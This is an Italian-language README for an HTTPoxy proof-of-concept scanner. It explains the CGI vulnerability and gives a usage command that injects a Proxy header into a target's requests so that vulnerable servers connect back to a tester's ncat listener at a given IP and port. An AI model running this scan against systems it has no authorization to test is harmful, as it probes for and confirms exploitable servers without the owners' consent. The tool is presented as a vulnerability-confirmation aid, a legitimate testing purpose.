
HTTPoxy Exploit Scanner di 1N3 @CrowdShield
di 1N3 @CrowdShield (https://crowdshield.com) Ultimo aggiornamento: 20160720
Scanner PoC/Exploit per scansionare file CGI comuni su un URL target per la vulnerabilità HTTPoxy. Httpoxy è un insieme di vulnerabilità che interessano il codice applicativo in esecuzione in ambienti CGI o simili a CGI. Per maggiori dettagli, visita https://httpoxy.org.
Richiede ncat per stabilire una sessione inversa
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Questo scannerà https://target.com con una lista di file CGI comuni mentre inietta un header Proxy verso un IP:PORT specificato. Un listener inverso catturerà la connessione in entrata per confermare che il sito remoto è vulnerabile.
Non mi assumo alcuna responsabilità per abusi o uso improprio di questo exploit.